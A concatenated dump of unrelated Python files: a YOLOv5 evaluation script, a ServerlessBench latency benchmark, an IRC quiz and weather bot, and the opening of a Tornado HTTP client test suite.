if step >= args.init_step:
stat_dict = agent.update(*replay_buffer.sample())
for k, v in stat_dict.items():
L.log(k, v, step)
obs = next_obs
state = next_state
episode_step += 1
if done and step > 0:
L.log('train/duration', time.time() - start_time, step)
L.log('train/episode_reward', episode_reward, step)
start_time = time.time()
L.dump(step)
obs, state = env.reset()
done = False
episode_reward = 0
episode_step = 0
episode += 1
L.log('train/episode', episode, step)
if args.save_model and step > 0 and step % args.save_model_freq == 0:
agent.save(model_dir, step)
# Terminate all threads and processes once done
if step == args.env_step + args.init_step and args.async:
stop = True
stat_recv_thread.join()
replay_buffer_process.terminate()
update_process.terminate()
# Terminate environment processes
env.terminate()
if __name__ == '__main__':
main()
|
test.py
|
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
log_imgs=0, # number of logged images
compute_loss=None):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = data.endswith('coco.yaml') # is COCO dataset
with open(data) as f:
data = yaml.load(f, Loader=yaml.SafeLoader) # model dict
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs, wandb = min(log_imgs, 100), None # ceil
try:
import wandb # Weights & Biases
except ImportError:
log_imgs = 0
# Dataloader
if not training:
img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
_ = model(img.half() if half else img) if device.type != 'cpu' else None # run once
path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images
dataloader = create_dataloader(path, imgsz, batch_size, model.stride.max(), opt, pad=0.5, rect=True,
prefix=colorstr('test: ' if opt.task == 'test' else 'val: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
inf_out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
output = non_max_suppression(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(output):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if plots and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
p, r, ap50, ap = p[:, 0], r[:, 0], ap[:, 0], ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95]
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
wandb.log({"Images": wandb_images})
wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = '../coco/annotations/instances_val2017.json' # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
model.float() # for training
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
check_requirements()
if opt.task in ['val', 'test']: # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt | opt.save_hybrid,
save_hybrid=opt.save_hybrid,
save_conf=opt.save_conf,
)
elif opt.task == 'study': # run over a range of settings and save/plot
for weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']:
f = 'study_%s_%s.txt' % (Path(opt.data).stem, Path(weights).stem) # filename to save to
x = list(range(320, 800, 64)) # x axis
y = [] # y axis
for i in x: # img-size
print('\nRunning %s point %s...' % (f, i))
r, _, t = test(opt.data, weights, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(f, x) # plot
|
run.py
|
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
# this script should be executed in parent dir of scripts
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./scripts/run-single.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes):
for j in range(warmupTimes):
r = os.popen("./scripts/action_invoke.sh")
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "java8action"
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','']
i = 0
count = 0
while count < 2:
while i < len(line):
if line[i].isdigit():
parsedTimes[count] = line[i:i+13]
i += 13
count += 1
continue
i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
print("%s / %d requests finished in %.2f seconds" %(requestNum, (loop * client), (duration/1000)))
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
if requestNum > 0:
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warmup_times: %d\n" % (client, loop, warmup))
resultfile.write("%s / %d requests finished in %.2f seconds\n" %(requestNum, (loop * client), (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
if requestNum > 0:
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main()
|
rtquizzer.py
|
#!/usr/bin/env python3
import asyncio
import re
from asyncirc import irc
from enum import IntEnum
import json
import asyncirc.plugins.addressed
import threading, time, os, re
import random
random = random.SystemRandom()
import urllib.parse
import requests
import sys
import collections
from datetime import date
from bs4 import BeautifulSoup
#supybot.ircutils (https://github.com/ProgVal/limnoria/tree/master/src/ircutils.py)
class ircutils(object):
def bold(s):
"""Returns the string s, bolded."""
return '\x02%s\x02' % s
def italic(s):
"""Returns the string s, italicised."""
return '\x1D%s\x1D' % s
# Definition of mircColors dictionary moved below because it became an IrcDict.
def mircColor(s, fg=None, bg=None):
"""Returns s with the appropriate mIRC color codes applied."""
if fg is None and bg is None:
return s
elif bg is None:
if str(fg) in mircColors:
fg = mircColors[str(fg)]
elif len(str(fg)) > 1:
fg = mircColors[str(fg)[:-1]]
else:
# Should not happen
pass
return '\x03%s%s\x03' % (fg.zfill(2), s)
elif fg is None:
bg = mircColors[str(bg)]
# According to the mirc color doc, a fg color MUST be specified if a
# background color is specified. So, we'll specify 00 (white) if the
# user doesn't specify one.
return '\x0300,%s%s\x03' % (bg.zfill(2), s)
else:
fg = mircColors[str(fg)]
bg = mircColors[str(bg)]
# No need to zfill fg because the comma delimits.
return '\x03%s,%s%s\x03' % (fg, bg.zfill(2), s)
def stripColor(s):
"""Returns the string s, with color removed."""
return _stripColorRe.sub('', s)
_stripColorRe = re.compile(r'\x03(?:\d{1,2},\d{1,2}|\d{1,2}|,\d{1,2}|)')
mircColors = {
'white': '0',
'black': '1',
'blue': '2',
'green': '3',
'red': '4',
'brown': '5',
'purple': '6',
'orange': '7',
'yellow': '8',
'light green': '9',
'teal': '10',
'light blue': '11',
'dark blue': '12',
'pink': '13',
'dark grey': '14',
'light grey': '15',
'dark gray': '14',
'light gray': '15',
}
# We'll map integers to their string form so mircColor is simpler.
for (k, v) in list(mircColors.items()):
if k is not None: # Ignore empty string for None.
sv = str(v)
mircColors[sv] = sv
mircColors[sv.zfill(2)] = sv
class State(IntEnum):
Question = 0
Tips = 1
Pause = 2
Answer = 3
class Quizbot(object):
quiz = None
test = None
event = None
questions = {}
current_question = []
current_category = ""
mode = State.Question
tips = 1
winner = None
points = {}
bot = None
channel = "#rt-quiz"
counter = 0
last = None
def __init__(self, bot):
self.bot = bot
self.event = threading.Event()
self.loadStats()
self.last = date.today()
self.quiz = threading.Thread(daemon=True, target=self.quizzing, args=())
self.quiz.start()
self.test = threading.Thread(daemon=True, target=self.checkForQuiz, args=())
def sleep(self, timeout : int):
self.event.wait(timeout)
self.event.clear()
def loadQuestions(self):
with open("questions.json", "r") as fobj:
self.questions = json.load(fobj)
def loadStats(self):
self.points = collections.defaultdict(lambda: 0)
self.daily = collections.defaultdict(lambda: 0)
if os.path.isfile("stats.json"):
with open("stats.json", "r") as fobj:
self.points.update(json.load(fobj))
if os.path.isfile("daily.json"):
with open("daily.json", "r") as fobj:
self.daily.update(json.load(fobj))
def reply(self, *args):
msg = "".join(ircutils.mircColor(i, 2, 0) for i in args)
self.bot.say(self.channel, msg)
def topic(self, *args):
topic = "".join(ircutils.mircColor(i, 2, 0) for i in args)
self.bot.writeln(f'TOPIC {self.channel} :{topic}')
def random(self, r : int):
return int(random.random() * r)
def checkForQuiz(self):
while True:
if not self.quiz.is_alive():
self.reply("Starte Quiz neu...")
del self.quiz
self.quiz = threading.Thread(daemon=True, target=self.quizzing, args=())
self.quiz.start()
self.sleep(60)
def quizzing(self):
while True:
if self.mode == State.Question:
self.loadQuestions()
self.winner = None
self.tips = 1
self.counter = 0
# [category, question, answer]
try:
self.current_question = random.choice(self.questions)
if not (self.current_question and len(self.current_question) >= 3 and self.validQuestion(self.current_question)):
continue
continue
self.reply(f"Kategorie {ircutils.bold(self.current_question[0])}: {self.current_question[1]}")
l = len(self.current_question[2])
self.current_question.append(l * 2 if l < 80 else l)
if not self.random(10):
self.reply(ircutils.mircColor("ACHTUNG: Dies ist eine Superpunkterunde. Der Gewinner bekommt die dreifache Punktezahl!", 4, 1))
self.current_question[3] *= 3
self.mode = State.Tips
except Exception as e: # general ignore
self.reply(f"Frage konnte nicht geladen werden: {str(e)}")
self.sleep(4)
continue
elif self.mode == State.Tips:
if self.counter < 4:
self.counter += 1
self.sleep(5)
continue
self.reply("{}{}{}".format(ircutils.bold("Tipp: "), self.current_question[2][:self.tips], "." * (len(self.current_question[2]) - self.tips)))
self.tips += 1
if self.tips >= len(self.current_question[2]):
self.counter = 0
self.mode = State.Pause
self.sleep(4)
continue
elif self.mode == State.Pause:
if not self.counter:
self.reply(ircutils.mircColor("Achtung, wenn die Frage innerhalb von 30 Sekunden nicht beantwortet wird, werde ich automatisch eine neue Runde starten!", 3, 1))
if self.counter < 6:
self.counter += 1
self.sleep(5)
continue
else:
self.counter = 0
self.mode = State.Answer
elif self.mode == State.Answer:
if self.winner is not None:
x = re.match(r"(.*?).{1}onAir", self.winner, re.IGNORECASE)
if x:
self.winner = x[1]
aliases = {
"l-micha" : "lmichael",
"spunki" : "lmichael"
}
if self.winner in aliases:
self.winner = aliases[self.winner]
if self.winner not in self.points:
for k in self.points:
if k.lower() == self.winner.lower():
self.winner = k
try:
self.current_question[3] = int(self.current_question[3])
except ValueError:
self.current_question[3] = len(self.current_question[2])
self.points[self.winner] += self.current_question[3]
self.daily[self.winner] += self.current_question[3]
self.reply(f"{self.winner} hat die Antwort", ircutils.mircColor(" " + self.current_question[2] + " ", 7, 1), "korrekt erraten, dafür gibt es", ircutils.mircColor(" " + str(self.current_question[3]) + " ", 4, 1), "Punkte!")
else:
self.reply(f"Keiner hat die Antwort", ircutils.mircColor(" " + self.current_question[2] + " ", 7, 1), "korrekt erraten :(")
self.mode = State.Question
self.current_question = None
self.current_category = ""
with open("stats.json", "w") as fobj:
json.dump(dict(self.points), fobj)
with open("daily.json", "w") as fobj:
json.dump(dict(self.daily), fobj)
if date.today() - self.last:
self.last = date.today()
self.daily = collections.defaultdict(lambda: 0)
self.reply(ircutils.mircColor("-------------", 7, 1))
#self.reply(ircutils.mircColor("Nächste Frage in 20s!", 7, 1))
#self.reply(ircutils.mircColor("-------------", 7, 1))
#self.sleep(20)
self.sleep(5)
def validQuestion(self, q : str) -> bool:
for i in ["Tipp", "Top 10", "admin@ryobots.de", "Zeit ist vorbei"]:
if i in q:
return False
return True
quiz = None
def git():
cached = os.stat(__file__).st_mtime
while True:
os.system("git pull")
stamp = os.stat(__file__).st_mtime
if stamp != cached:
cached = stamp
print("Restarting")
os._exit(0)
time.sleep(300)
asyncirc.plugins.addressed.register_command_character("!")
bot = irc.connect("irc.euirc.net", 6667, use_ssl=False)
bot.register("RT-Quizzer", "RT-Quizzer", "RT-Quizzer", password="quizzer").join([Quizbot.channel, "#radio-thirty"])
@bot.on("irc-001")
def connected(par=None):
global quiz
quiz = Quizbot(bot)
threading.Thread(target=git, args=(), daemon=True).start()
bot.writeln(f"MODE {bot.nick} +B")
@bot.on("addressed")
def on_addressed(message, user, target, text):
global quiz
def say(target, text):
text = text.replace("\n", "").replace("\r", "")
while text:
bot._writeln(f"PRIVMSG {target} :{text[:400]}")
text = text[400:]
if target == "#radio-thirty":
aliases = {
re.compile("^wedda") : "wetter chieming",
re.compile("^weer") : "wetter 26197",
re.compile("^wetter f.rth") : "wetter fürth"
}
for regex, location in aliases.items():
text = regex.sub(location, text)
if text.startswith("wetter"):
cmd = text.split()
if len(cmd) < 2:
return
cmd[1] = cmd[1].lower().split(".")[0]
if cmd[1] == "moon" or cmd[1].startswith(":"):
return
r = requests.get(f"http://de.wttr.in/{urllib.parse.quote(cmd[1])}?Q0T")
for i, line in enumerate(r.text.splitlines()):
if i and i % 6 == 0:
sleep(2)
say(target, line)
elif text.startswith("sendeplan"):
page = BeautifulSoup(requests.get("http://radio-thirty.de/sendeplan_xl").text, "lxml")
emissions = []
started = False
current_emission = {}
for tr in page.tr.td.table.find_all("tr", recursive=False):
try:
emission = {
"time" : tr.td.table.tr.td.next_sibling.next_sibling.text.replace("°", "").replace("U", " U"),
"moderator" : tr.td.next_sibling.next_sibling.table.tr.td.next_sibling.next_sibling.text,
"title" : tr.td.next_sibling.next_sibling.table.tr.td.next_sibling.next_sibling.next_sibling.next_sibling.text
}
if emission["moderator"] == "":
started = False
if current_emission != {}:
emissions.append(current_emission.copy())
current_emission = {}
elif started:
if current_emission["moderator"] != emission["moderator"]:
emissions.append(current_emission.copy())
current_emission = emission
else:
current_emission["time"] = current_emission["time"].split("-")[0] + "-" + emission["time"].split("-")[1]
current_emission["title"] += emission["title"]
else:
started = True
current_emission = emission
except Exception:
continue
for emission in emissions:
say(target, f"{emission['title']} mit {emission['moderator']} von {emission['time']}")
if target != Quizbot.channel or not quiz:
return
if text in ["punkte", "tag"]:
for i, p in enumerate(sorted((quiz.daily if text == "tag" else quiz.points).items(), key=lambda x: x[1], reverse=True), start=1):
quiz.reply(f"{i}.\t{p[0]} ({p[1]})")
if i >= 10:
break
elif text == "anzahl":
quiz.reply(f"{len(quiz.questions)} Fragen")
elif text == "frage":
quiz.reply(f"Kategorie {ircutils.bold(quiz.current_question[0])}: {quiz.current_question[1]}")
current_category = ""
current_question = []
questions = {}
@bot.on("message")
def on_message(message, user, target, text):
if target == Quizbot.channel and quiz and quiz.current_question and not quiz.winner and text.lower() == quiz.current_question[2].lower():
quiz.winner = user.nick
quiz.mode = State.Answer
quiz.event.set()
@bot.on("connection-lost")
def on_disconnected(*args):
sys.exit(0)
asyncio.get_event_loop().run_forever()
|
httpclient_test.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function, with_statement
import base64
import binascii
from contextlib import closing
import functools
import sys
import threading
from tornado.escape import utf8
from tornado.httpclient import HTTPRequest, HTTPResponse, _RequestProxy, HTTPError, HTTPClient
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream
from tornado.log import gen_log
from tornado import netutil
from tornado.stack_context import ExceptionStackContext, NullContext
from tornado.testing import AsyncHTTPTestCase, bind_unused_port, gen_test, ExpectLog
from tornado.test.util import unittest
from tornado.util import u, bytes_type
from tornado.web import Application, RequestHandler, url
try:
from io import BytesIO # python 3
except ImportError:
from cStringIO import StringIO as BytesIO
class HelloWorldHandler(RequestHandler):
def get(self):
name = self.get_argument("name", "world")
self.set_header("Content-Type", "text/plain")
self.finish("Hello %s!" % name)
class PostHandler(RequestHandler):
def post(self):
self.finish("Post arg1: %s, arg2: %s" % (
self.get_argument("arg1"), self.get_argument("arg2")))
class ChunkHandler(RequestHandler):
def get(self):
self.write("asdf")
self.flush()
self.write("qwer")
class AuthHandler(RequestHandler):
def get(self):
self.finish(self.request.headers["Authorization"])
class CountdownHandler(RequestHandler):
def get(self, count):
count = int(count)
if count > 0:
self.redirect(self.reverse_url("countdown", count - 1))
else:
self.write("Zero")
class EchoPostHandler(RequestHandler):
def post(self):
self.write(self.request.body)
class UserAgentHandler(RequestHandler):
def get(self):
self.write(self.request.headers.get('User-Agent', 'User agent not set'))
class ContentLength304Handler(RequestHandler):
def get(self):
self.set_status(304)
self.set_header('Content-Length', 42)
def _clear_headers_for_304(self):
# Tornado strips content-length from 304 responses, but here we
# want to simulate servers that include the headers anyway.
pass
class AllMethodsHandler(RequestHandler):
SUPPORTED_METHODS = RequestHandler.SUPPORTED_METHODS + ('OTHER',)
def method(self):
self.write(self.request.method)
get = post = put = delete = options = patch = other = method
# These tests end up getting run redundantly: once here with the default
# HTTPClient implementation, and then again in each implementation's own
# test suite.
class HTTPClientCommonTestCase(AsyncHTTPTestCase):
def get_app(self):
return Application([
url("/hello", HelloWorldHandler),
url("/post", PostHandler),
url("/chunk", ChunkHandler),
url("/auth", AuthHandler),
url("/countdown/([0-9]+)", CountdownHandler, name="countdown"),
url("/echopost", EchoPostHandler),
url("/user_agent", UserAgentHandler),
url("/304_with_content_length", ContentLength304Handler),
